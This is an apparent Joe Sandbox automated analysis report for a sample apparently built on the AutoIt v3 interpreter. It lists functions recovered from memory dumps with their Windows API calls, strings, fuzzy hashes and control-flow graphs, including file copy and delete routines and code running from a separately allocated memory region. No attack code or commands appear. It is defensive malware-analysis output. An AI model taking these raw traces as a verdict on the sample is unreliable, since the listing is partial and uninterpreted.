                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb7$pb7$pb7$pb7
                                                                                                                    • API String ID: 4212290369-647323737
                                                                                                                    • Opcode ID: 8d6f3c33f4eab496bf8054fe4ff240c9cdc961a28cf4ab93e7085fcbec1f364c
                                                                                                                    • Instruction ID: f70a0babb62a0a0dbfc8290073ff8c1bab0ff70a51fb034f4ff83a2efe45cf3c
                                                                                                                    • Opcode Fuzzy Hash: 8d6f3c33f4eab496bf8054fe4ff240c9cdc961a28cf4ab93e7085fcbec1f364c
                                                                                                                    • Instruction Fuzzy Hash: 34B2D570624746DFD729DF24C885FAAF7E4BF84344F144A2DE659872A1C770E8A4CB82
                                                                                                                    Function 00319155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00318F5F: __time64.LIBCMT ref: 00318F69
                                                                                                                      • Part of subcall function 002B4EE5: _fseek.LIBCMT ref: 002B4EFD
                                                                                                                    • __wsplitpath.LIBCMT ref: 00319234
                                                                                                                      • Part of subcall function 002D40FB: __wsplitpath_helper.LIBCMT ref: 002D413B
                                                                                                                    • _wcscpy.LIBCMT ref: 00319247
                                                                                                                    • _wcscat.LIBCMT ref: 0031925A
                                                                                                                    • __wsplitpath.LIBCMT ref: 0031927F
                                                                                                                    • _wcscat.LIBCMT ref: 00319295
                                                                                                                    • _wcscat.LIBCMT ref: 003192A8
                                                                                                                      • Part of subcall function 00318FA5: _memmove.LIBCMT ref: 00318FDE
                                                                                                                      • Part of subcall function 00318FA5: _memmove.LIBCMT ref: 00318FED
                                                                                                                    • _wcscmp.LIBCMT ref: 003191EF
                                                                                                                      • Part of subcall function 00319734: _wcscmp.LIBCMT ref: 00319824
                                                                                                                      • Part of subcall function 00319734: _wcscmp.LIBCMT ref: 00319837
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00319452
                                                                                                                    • _wcsncpy.LIBCMT ref: 003194C5
                                                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 003194FB
                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00319511
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00319522
                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00319534
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1500180987-0
                                                                                                                    • Opcode ID: 0ecb10070153603181b1864753303ed02212826a2dad5b6a6deafe2f9dde8428
                                                                                                                    • Instruction ID: 122e8a6936674917f18fd9ad814155055e618a42774ba1dd1868bd27309828a1
                                                                                                                    • Opcode Fuzzy Hash: 0ecb10070153603181b1864753303ed02212826a2dad5b6a6deafe2f9dde8428
                                                                                                                    • Instruction Fuzzy Hash: 48C15BB1D00219AACF26DF95CC95ADEB7BDEF59340F0040AAF609E7241DB309A948F65
                                                                                                                    Function 002B3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 002B3074
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 002B309E
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B30AF
                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 002B30CC
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B30DC
                                                                                                                    • LoadIconW.USER32(000000A9), ref: 002B30F2
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B3101
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                    • Opcode ID: fb6609bd788b1c4e13e4ee3c6441ff0842b4b216bd04be2d08e3cb66c1a39729
                                                                                                                    • Instruction ID: 258eb78dfe426b99255fd6de924f90bfa0c31316091b1c8af14dc147c70cdbc2
                                                                                                                    • Opcode Fuzzy Hash: fb6609bd788b1c4e13e4ee3c6441ff0842b4b216bd04be2d08e3cb66c1a39729
                                                                                                                    • Instruction Fuzzy Hash: 3E314771D44349AFDB12CFA4E888A89BBF8FB09310F14456EE584E62A1D3B54585CF51
                                                                                                                    Function 002B3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 002B3074
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 002B309E
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B30AF
                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 002B30CC
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B30DC
                                                                                                                    • LoadIconW.USER32(000000A9), ref: 002B30F2
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B3101
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                    • Opcode ID: ad35b0ecf83525f59192ac49193775a4bfd87e12ae5f49a0ec6ad9fd58e6b6a3
                                                                                                                    • Instruction ID: 40d858793f680c3e6f61ef5d74cd73ec83db52d9e1a3b81d3ccdb1b6b1e0f29c
                                                                                                                    • Opcode Fuzzy Hash: ad35b0ecf83525f59192ac49193775a4bfd87e12ae5f49a0ec6ad9fd58e6b6a3
                                                                                                                    • Instruction Fuzzy Hash: D121C7B1D11318AFDB16DFA8ED89BDDBBF8FB08700F40412AF915A62A0D7B145848F91
                                                                                                                    Function 002B708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003752F8,?,002B37AE,?), ref: 002B4724
                                                                                                                      • Part of subcall function 002D050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,002B7165), ref: 002D052D
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002B71A8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002EE8C8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002EE909
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 002EE947
                                                                                                                    • _wcscat.LIBCMT ref: 002EE9A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                    • API String ID: 2673923337-2727554177
                                                                                                                    • Opcode ID: 8cff855474db140bef7a821140f5ec211253257b208322834ed09b6c6bb7a5a0
                                                                                                                    • Instruction ID: ea0d8b2c3c0d2b37188db3869c62bd5e5a3064586e90fa575e34ff763289b783
                                                                                                                    • Opcode Fuzzy Hash: 8cff855474db140bef7a821140f5ec211253257b208322834ed09b6c6bb7a5a0
                                                                                                                    • Instruction Fuzzy Hash: 8171AF714187019EC751EF25E8929ABB7ECFF84350F80092EF449972B2DB719998CF51
                                                                                                                    Function 002B3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 760 2b3633-2b3681 762 2b3683-2b3686 760->762 763 2b36e1-2b36e3 760->763 764 2b3688-2b368f 762->764 765 2b36e7 762->765 763->762 766 2b36e5 763->766 770 2b374b-2b3753 PostQuitMessage 764->770 771 2b3695-2b369a 764->771 768 2ed0cc-2ed0fa call 2c1070 call 2c1093 765->768 769 2b36ed-2b36f0 765->769 767 2b36ca-2b36d2 DefWindowProcW 766->767 778 2b36d8-2b36de 767->778 807 2ed0ff-2ed106 768->807 772 2b36f2-2b36f3 769->772 773 2b3715-2b373c SetTimer RegisterWindowMessageW 769->773 777 2b3711-2b3713 770->777 775 2ed154-2ed168 call 312527 771->775 776 2b36a0-2b36a2 771->776 779 2ed06f-2ed072 772->779 780 2b36f9-2b370c KillTimer call 2b443a call 2b3114 772->780 773->777 782 2b373e-2b3749 CreatePopupMenu 773->782 775->777 801 2ed16e 775->801 783 2b36a8-2b36ad 776->783 784 2b3755-2b375f call 2b44a0 776->784 777->778 792 2ed0a8-2ed0c7 MoveWindow 779->792 793 2ed074-2ed076 779->793 780->777 782->777 788 2ed139-2ed140 783->788 789 2b36b3-2b36b8 783->789 802 2b3764 784->802 788->767 797 2ed146-2ed14f call 307c36 788->797 799 2b36be-2b36c4 789->799 800 2ed124-2ed134 call 312d36 789->800 792->777 794 2ed078-2ed07b 793->794 795 2ed097-2ed0a3 SetFocus 793->795 794->799 803 2ed081-2ed092 call 2c1070 794->803 795->777 797->767 799->767 799->807 800->777 801->767 802->777 803->777 807->767 811 2ed10c-2ed11f call 2b443a call 2b434a 807->811 811->767
                                                                                                                    APIs
                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 002B36D2
                                                                                                                    • KillTimer.USER32(?,00000001), ref: 002B36FC
                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002B371F
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B372A
                                                                                                                    • CreatePopupMenu.USER32 ref: 002B373E
                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 002B374D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated$%4
                                                                                                                    • API String ID: 129472671-1770572163
                                                                                                                    • Opcode ID: bb3243c1e2c2fcb8ed1952cfa82235b4900fe14fa395d8f2ec15d177d76345ae
                                                                                                                    • Instruction ID: 507c2e8222475892084a12c9f66c23c2b6957e4fbb79af0a32db1dbf4972ead0
                                                                                                                    • Opcode Fuzzy Hash: bb3243c1e2c2fcb8ed1952cfa82235b4900fe14fa395d8f2ec15d177d76345ae
                                                                                                                    • Instruction Fuzzy Hash: 424159B1230906BFDB2AEF24DC49BF9375CEB00380F940525F506D62A2CFE49DB0A665
                                                                                                                    Function 002B3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 002B3A50
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 002B3A5F
                                                                                                                    • LoadIconW.USER32(00000063), ref: 002B3A76
                                                                                                                    • LoadIconW.USER32(000000A4), ref: 002B3A88
                                                                                                                    • LoadIconW.USER32(000000A2), ref: 002B3A9A
                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002B3AC0
                                                                                                                    • RegisterClassExW.USER32(?), ref: 002B3B16
                                                                                                                      • Part of subcall function 002B3041: GetSysColorBrush.USER32(0000000F), ref: 002B3074
                                                                                                                      • Part of subcall function 002B3041: RegisterClassExW.USER32(00000030), ref: 002B309E
                                                                                                                      • Part of subcall function 002B3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B30AF
                                                                                                                      • Part of subcall function 002B3041: InitCommonControlsEx.COMCTL32(?), ref: 002B30CC
                                                                                                                      • Part of subcall function 002B3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B30DC
                                                                                                                      • Part of subcall function 002B3041: LoadIconW.USER32(000000A9), ref: 002B30F2
                                                                                                                      • Part of subcall function 002B3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B3101
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                    • Opcode ID: 9ec4e07afcf17d106bc96555054a9fd932ec3ab81336e5cc238f8909ed0dea03
                                                                                                                    • Instruction ID: c1b6278eb48858528ef54cdca5955017b9fa5644063cffddc0f03dfcd2969df8
                                                                                                                    • Opcode Fuzzy Hash: 9ec4e07afcf17d106bc96555054a9fd932ec3ab81336e5cc238f8909ed0dea03
                                                                                                                    • Instruction Fuzzy Hash: 1D214D70D10304AFEB26DFA4EC49B9D7BF9FB08751F10091AE608A62A2D7F655909F84
                                                                                                                    Function 002B3766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R7
                                                                                                                    • API String ID: 1825951767-761371267
                                                                                                                    • Opcode ID: de2720bd6329737929db2b381045296deca83afbd0e18396c3f88cba4a42517c
                                                                                                                    • Instruction ID: b26f58b54c4a05a9f4f3b5a8580adda883b9efc9f5dd887244d9a38d19c61e01
                                                                                                                    • Opcode Fuzzy Hash: de2720bd6329737929db2b381045296deca83afbd0e18396c3f88cba4a42517c
                                                                                                                    • Instruction Fuzzy Hash: 2CA17C71D2021D9ADF15EBA0DC95AEEB778BF14380F44042AF415B7192EF74AA58CFA0
                                                                                                                    Function 002BF76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002D0193
                                                                                                                      • Part of subcall function 002D0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 002D019B
                                                                                                                      • Part of subcall function 002D0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002D01A6
                                                                                                                      • Part of subcall function 002D0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002D01B1
                                                                                                                      • Part of subcall function 002D0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 002D01B9
                                                                                                                      • Part of subcall function 002D0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 002D01C1
                                                                                                                      • Part of subcall function 002C60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002BF930), ref: 002C6154
                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002BF9CD
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 002BFA4A
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002F45C8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                    • String ID: <W7$\T7$%4$S7
                                                                                                                    • API String ID: 1986988660-1010537161
                                                                                                                    • Opcode ID: 3a26eb5b0d1c5dc265dbd551293b67fcf0797dfe50c96f2d7326f8e7b5acb21c
                                                                                                                    • Instruction ID: 5c167ff676957e09f779a305237569d895fa88a2b705af94627f53da6f2f4974
                                                                                                                    • Opcode Fuzzy Hash: 3a26eb5b0d1c5dc265dbd551293b67fcf0797dfe50c96f2d7326f8e7b5acb21c
                                                                                                                    • Instruction Fuzzy Hash: CA81BDB4911A80CEE3BEDF2AA9456597BEDEB99306F90852E900DCB271E7F444C5CF10
                                                                                                                    Function 01169258 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1050 1169258-11692aa call 1169158 CreateFileW 1053 11692b3-11692c0 1050->1053 1054 11692ac-11692ae 1050->1054 1057 11692c2-11692ce 1053->1057 1058 11692d3-11692ea VirtualAlloc 1053->1058 1055 116940c-1169410 1054->1055 1057->1055 1059 11692f3-1169319 CreateFileW 1058->1059 1060 11692ec-11692ee 1058->1060 1062 116933d-1169357 ReadFile 1059->1062 1063 116931b-1169338 1059->1063 1060->1055 1064 116937b-116937f 1062->1064 1065 1169359-1169376 1062->1065 1063->1055 1066 11693a0-11693b7 WriteFile 1064->1066 1067 1169381-116939e 1064->1067 1065->1055 1070 11693e2-1169407 CloseHandle VirtualFree 1066->1070 1071 11693b9-11693e0 1066->1071 1067->1055 1070->1055 1071->1055
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0116929D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                    • Instruction ID: e9eaf53d896ddd5863d9b8e5ff136f976ec1c0faebb5ddef9300486cd1017c8a
                                                                                                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                    • Instruction Fuzzy Hash: 4151F575A50208FFEF24DFA4CC49FEE7778AF48705F108558F60AAA180DB759645CB60
                                                                                                                    Function 002B39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1090 2b39d5-2b3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002B3A03
                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002B3A24
                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 002B3A38
                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 002B3A41
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateShow
                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                    • Opcode ID: 4a1a8d8a4d1328e4faf76af352111efe92d0f6becce8b6ed1de4f6cb0cbecf5e
                                                                                                                    • Instruction ID: 9ad01a35aa0a0c7de8854ff6a4c719cb15bcd481313074ebd329fdc5103dcaa8
                                                                                                                    • Opcode Fuzzy Hash: 4a1a8d8a4d1328e4faf76af352111efe92d0f6becce8b6ed1de4f6cb0cbecf5e
                                                                                                                    • Instruction Fuzzy Hash: 3CF03A709002907EEA3257236C89E6B2E7DD7C6F50F00042EFA08A2271C6A10880DAB0
                                                                                                                    Function 002B407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
